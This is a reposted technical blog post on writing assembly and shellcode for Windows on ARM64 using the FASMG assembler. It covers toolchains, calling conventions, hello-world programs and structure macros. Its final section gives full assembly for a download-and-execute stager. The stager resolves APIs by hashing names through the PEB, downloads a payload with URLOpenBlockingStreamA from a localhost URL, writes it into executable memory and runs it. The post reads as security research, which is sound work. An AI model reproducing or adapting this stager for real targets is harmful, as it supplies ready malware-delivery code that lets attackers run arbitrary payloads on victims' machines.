Shellcode: Windows on ARM64 / AArch64
2024-9-16 22:32:33 Author: modexp.wordpress.com(查看原文) 阅读量:12 收藏

Introduction

Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-Bit ARMv7 architecture. By the summer of 2013, it was considered to be a commercial flop.

For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi4.

From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.

Toolchain

To support Windows on ARM, you have at least three options:

MSVC and LLVM-MinGW are best for C/C++. And I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations. From what I can tell, ARMASM has no support for structures making it very difficult to write programs in assembly. This is also a problem with the GNU Assembler and the only way around it is to use symbolic names with the hardcoded offset of each field.

There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.”. There are include files for fasmg which implement ARM64 instructions using macros and it’s what I decided to use for a simple PoC in this post.

Once you setup FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file that I execute from a command prompt inside the root directory of fasm looks like this:

@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core

Thomas has also provided an ARM64 example to get started.

Calling Convention

Windows uses the same as what’s used on Linux for subroutines. However, invocation of system calls are different: Linux uses x8 to hold system call ID whereas Windows embeds the ID in the SVC instruction.

Register Volatile? Role
x0 Yes Parameter/scratch register 1, result register
x1-x7 Yes Parameter/scratch register 2-8
x8-x15 Yes Scratch registers. Used as parameter too.
x16-x17 Yes Intra-procedure-call scratch registers
x18 No Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB
x19-x28 No
Scratch register
x29/fp No Frame pointer
x30/lr No Link register
x31/zxr No Zero register

Hello, World! (Console)

Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.

    ; armasm64 hello.asm -ohello.obj
    ; cl hello.obj /link /subsystem:console /entry:start kernel32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be the number of register available to load address of API
    MACRO
        INVOKE $p1, $p2          ; name of macro followed by number of parameters
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!\n"

; symbolic constants for clarity
NULL equ 0
STD_OUTPUT_HANDLE equ -11

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API WriteFile
    IMPORT_API GetStdHandle

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x0, STD_OUTPUT_HANDLE
    INVOKE      x1, GetStdHandle

    mov         x4, NULL
    mov         x3, NULL
    mov         x2, 14     ; string length...
    adr         x1,Text
    INVOKE      x5, WriteFile

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

And a simple GUI. A version for FASMG can be found here.

Hello, World! (GUI)

    ; armasm64 msgbox.asm -omsgbox.obj
    ; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be the free register available to load address of API
    MACRO
        INVOKE $p1, $p2
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!", 0x0
Caption DCB "Hello from ARM64", 0x0

; symbolic names for clarity
NULL equ 0

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API MessageBoxA

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x3,NULL
    adr         x2,Caption
    adr         x1,Text
    mov         x0,NULL
    INVOKE      x4, MessageBoxA

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

Symbolic Names

; The following are 64-Bit offsets.
TEB_ProcessEnvironmentBlock                  = 0x00000060
TEB_LastErrorValue                           = 0x00000068

PEB_Ldr                                      = 0x00000018
PEB_LDR_DATA_InLoadOrderModuleList           = 0x00000010

LDR_DATA_TABLE_ENTRY_DllBase                 = 0x00000030

IMAGE_DOS_HEADER_e_lfanew                    = 0x0000003C

IMAGE_EXPORT_DIRECTORY_Characteristics       = 0x00000000
IMAGE_EXPORT_DIRECTORY_TimeDateStamp         = 0x0004
IMAGE_EXPORT_DIRECTORY_MajorVersion          = 0x0008
IMAGE_EXPORT_DIRECTORY_MinorVersion          = 0x000A
IMAGE_EXPORT_DIRECTORY_Name                  = 0x0000000C
IMAGE_EXPORT_DIRECTORY_Base                  = 0x00000010
IMAGE_EXPORT_DIRECTORY_NumberOfFunctions     = 0x00000014
IMAGE_EXPORT_DIRECTORY_NumberOfNames         = 0x00000018
IMAGE_EXPORT_DIRECTORY_AddressOfFunctions    = 0x0000001C
IMAGE_EXPORT_DIRECTORY_AddressOfNames        = 0x00000020
IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals = 0x00000024

STATFLAG_DEFAULT = 0
STATFLAG_NONAME = 1
STATFLAG_NOOPEN = 2

STREAM_SEEK_SET	= 0
STREAM_SEEK_CUR	= 1
STREAM_SEEK_END	= 2

Structures and Unions

FASMG provides macros to support struct and union that are supported by Borland’s Turbo or Microsoft’s Macro Assembler.

struct LARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct ULARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct GUID
    Data1 	dd ?
    Data2 	dw ?
    Data3 	dw ?
    Data4 	db 8 dup(?)
ends
    
struct STATSTG
    pwcsName          dq ?   ; LPOLESTR
    _type             dd ?   ; DWORD
    _padding          dd ?   ; padding for _type
    cbSize            ULARGE_INTEGER
    mtime             FILETIME    
    ctime             FILETIME  
    atime             FILETIME
    grfMode           dd ?
    grfLocksSupported dd ?
    clsid             GUID
    grfStateBits      dd ?
    reserved          dd ?
ends

COM Interfaces

The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There’s also comcall and cominvk macros to invoke interface methods. I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.

struct IStreamVtbl
    ; IUnknown
    QueryInterface dq ?
    AddRef         dq ?
    Release        dq ?
    
    ; ISequentialStream
    Read           dq ?
    Write          dq ?
    
    ; IStream
    Seek           dq ?
    SetSize        dq ?
    CopyTo         dq ?
    Commit         dq ?
    Revert         dq ?
    LockRegion     dq ?
    UnlockRegion   dq ?
    Stat           dq ?
    Clone          dq ?
ends
          
struct IStream
    lpVtbl         dq ? ; pointer to IStreamVtbl
ends

Local Variables

FASMG doesn’t support these out of the box. But what you can do is define a structure with your variables in it.

struct var_tbl
    pStream   IStream
    Stg       STATSTG
    liZero    LARGE_INTEGER
    BytesRead dq ?
    pCode     dq ?
ends

At the entry of program or subroutine, subtract the size of the structure (aligned by 16) from the stack pointer.

    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)

Then when you need to address a variable, offsets can be accessed with the ADD instruction.

    ; x2 = &var_tbl.pStream
    add        x2, sp, var_tbl.pStream

To access the value store in var_tbl.pStream

    ; x2 = var_tbl.pStream
    ldr        x2, [sp, var_tbl.pStream]

Macros

The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.

macro hash_api dll_name, api_name
    local dll_hash, api_hash, b

    ; DLL 
    virtual at 0  
        db dll_name  
        dll_hash = 0  
        repeat $
            load b byte from % - 1  
            dll_hash = (dll_hash + b) and 0xFFFFFFFF
            dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    ; API
    virtual at 0  
        db api_name  
        api_hash = 0  
        repeat $
            load b byte from % - 1
            api_hash = (api_hash + b) and 0xFFFFFFFF
            api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro

Thread Environment Block

xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer check debugging symbols.

System Calls

For x86, the syscall number is placed in the accumulator (EAX/RAX) but for ARM64, it’s embedded in the SVC opcode itself and there appears to be no alternative. (at least not that I’m aware of). To build a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.

HTTP Download

The following code uses URLOpenBlockingStream to download a shellcode and execute in memory.

start:
    ;brk        #0xF000
    
    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)
    
    adr        x20, hash_tbl
    adr        x21, invoke_api

    ; LoadLibraryA("urlmon.dll")
    adr        x0, urlmon_name
    blr        x21
    cbz        x0, exit_shellcode
    
    ; hr = URLOpenBlockingStreamA(NULL, szUrl, &pStream, 0, 0);
    mov        x4, xzr
    mov        x3, xzr
    add        x2, sp, var_tbl.pStream
    adr        x1, url_path
    mov        x0, xzr           ; NULL
    blr        x21
    cbnz       x0, exit_shellcode
    
    ; STATSTG Stg;
    ; hr = pStream->Stat(&Stg, STATFLAG_NONAME);
    mov        x2, STATFLAG_NONAME
    add        x1, sp, var_tbl.Stg
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x3, [x0, IStream.lpVtbl]
    ldr        x3, [x3, IStreamVtbl.Stat]
    blr        x3
    cbnz       x0, exit_shellcode    
    
    ; LARGE_INTEGER liZero = { 0 }; 
    ; hr = pStream->Seek(liZero, STREAM_SEEK_SET, NULL);
    mov        x3, xzr                ; NULL
    mov        x2, xzr                ; STREAM_SEEK_SET
    add        x1, sp, var_tbl.liZero
    str        xzr, [x1]
    mov        x1, xzr
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Seek]
    blr        x4 
    cbnz       x0, exit_shellcode  
    
    ; pCode = VirtualAlloc(NULL, Stg.cbSize.LowPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    mov        x3, PAGE_EXECUTE_READWRITE
    mov        x2, MEM_COMMIT
    ldr        w1, [sp, var_tbl.Stg.cbSize.LowPart]
    mov        x0, NULL
    blr        x21
    cbz        x0, exit_shellcode  
    
    str        x0, [sp, var_tbl.pCode]
    
    ; hr = pStream->Read(pCode, Stg.cbSize.LowPart, &BytesRead);
    add        x3, sp, var_tbl.BytesRead
    ldr        w2, [sp, var_tbl.Stg.cbSize.LowPart]
    ldr        x1, [sp, var_tbl.pCode]
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Read]
    blr        x4
    cbnz       x0, exit_shellcode  
    
    ldr        x0, [sp, var_tbl.pCode]
    blr        x0
    
    blr        x21
    cbz        x0, exit_shellcode 
exit_shellcode:
    add        sp, sp, ((sizeof.var_tbl + 15) and -16)
    ret
    
invoke_api:
    ; save parameters, except for x0, which won't be used.
    stp        x1, x2, [sp, -64]!
    stp        x3, x4, [sp, 16]
    stp        x5, x6, [sp, 32]
    stp        x7, x8, [sp, 48]

    ; Ldr = (PPEB_LDR_DATA)NtCurrentTeb()->ProcessEnvironmentBlock->Ldr;
    mov        x1, x18 ; xpr
    ldr        x2, [x1, TEB_ProcessEnvironmentBlock]
    ldr        x2, [x2, PEB_Ldr]
    
    ; end = (PLIST_ENTRY)&Ldr->InLoadOrderModuleList;
    add        x2, x2, PEB_LDR_DATA_InLoadOrderModuleList
    ; nxt = end->Flink;
    ldr        x3, [x2]            ; read first entry
nxt_dll:
    cmp        x3, x2              ; while (nxt != end)
    bne        load_dll_loop
    add        sp, sp, 64          ; fixup stack
    ;ret                            ; return to caller
load_dll_loop:
    ; bx = e->DllBase 
    ldr        x4, [x3, LDR_DATA_TABLE_ENTRY_DllBase]         
    ldr        x3, [x3]            ; nxt = nxt->Flink
    
    ; nt = VA(PIMAGE_NT_HEADERS, bx, ((PIMAGE_DOS_HEADER)e->DllBase)->e_lfanew);
    ldr        w5, [x4, IMAGE_DOS_HEADER_e_lfanew]     
    add        x5, x4, w5, uxtw #0 
    
    ; va = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    ; if (!va) continue;
    ldr        w5, [x5, #0x88]     
    cbz        w5, nxt_dll         
    
    ; exp = VA(PIMAGE_EXPORT_DIRECTORY, bx, va);
    add        x5, x4, w5, uxtw #0 
    
    ; cnt = exp->NumberOfNames;
    ; if (!cnt) continue;
    ldr        w6, [x5, IMAGE_EXPORT_DIRECTORY_NumberOfNames]    
    cbz        w6, nxt_dll        
    
    ; dll = VA(PCHAR, bx, exp->Name);
    ldr        w7, [x5, IMAGE_EXPORT_DIRECTORY_Name]      
    add        x7, x4, w7, uxtw #0

    mov        w8, #0              ; dx = 0
hash_dll:
    ; while (*dll) c = *dll++, 
    ; c = (c >= 'A' && c <= 'Z') ? (c | 32) : c, dx += c, dx = R(dx, 8);
    ldrsb      x9, [x7], 1        
    cbz        x9, exit_hash_dll
    
    sub        x10, x9, 'A'
    orr        x11, x9, 32
    cmp        x10, 26
    csel       x9, x11, x9, cc
    add        w8, w8, w9
    ror        w8, w8, 8
    b          hash_dll
exit_hash_dll:
    ; aon = VA(PDWORD, bx, exp->AddressOfNames);
    ldr        w9, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNames]
    add        x9, x4, w9, uxtw #0
    mov        x10, #0
nxt_api:
    mov        x11, #0
    ; api = VA(PCHAR, bx, aon[i]);
    ldr        w12, [x9, w10, uxtw #2] 
    add        x12, x4, w12, uxtw #0
hash_api_loop:
    ; while (*api) ax += *api++, ax = R(ax, 8);
    ldrsb      x13, [x12], 1
    cbz        x13, exit_hash_api
    
    add        w11, w11, w13
    ror        w11, w11, 8
    b          hash_api_loop
exit_hash_api:
    add        w11, w11, w8    ; 
    ldr        w12, [x20]      ; load hash
    cmp        w11, w12        ; if ((ax + dx) == hx)
    beq        load_api
    
    add        w10, w10, 1     ; i++
    cmp        w10, w6         ; i < cnt
    bne        nxt_api
    b          nxt_dll
    
load_api:
    add        x20, x20, 4
    
    ; aof = VA(PDWORD, bx, exp->AddressOfFunctions);
    ldr        w1, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfFunctions]
    add        x1, x4, x1
    
    ; ono = VA(PDWORD, bx, exp->AddressOfNameOrdinals);
    ldr        w2, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals]  
    add        x2, x4, x2
    
    ; pfn = VA(PVOID, bx, aof[ono[i]]);
    ldrh       w2, [x2, w10, uxtw #1]  ; read ordinal
    ldr        w1, [x1, x2, lsl #2]    ; read address of function rva
    add        x9, x4, w1, uxtw #0     ; add base

    ; load parameters saved on stack
    ldp        x1, x2, [sp], 16
    ldp        x3, x4, [sp], 16
    ldp        x5, x6, [sp], 16
    ldp        x7, x8, [sp], 16
    
    ; execute API and return to original caller.
    br         x9   
hash_tbl:
    hash_api "kernelbase.dll", "LoadLibraryA"
    hash_api "urlmon.dll",     "URLOpenBlockingStreamA"
    hash_api "kernelbase.dll", "VirtualAlloc"
    hash_api "kernelbase.dll", "ExitThread"
urlmon_name:
    db "urlmon", 0
url_path:
    db "http://localhost:1234/notepad.arm64.bin", 0

Further Reading


文章来源: https://modexp.wordpress.com/2024/09/16/windows_arm64/
如有侵权请联系:admin#unsafe.sh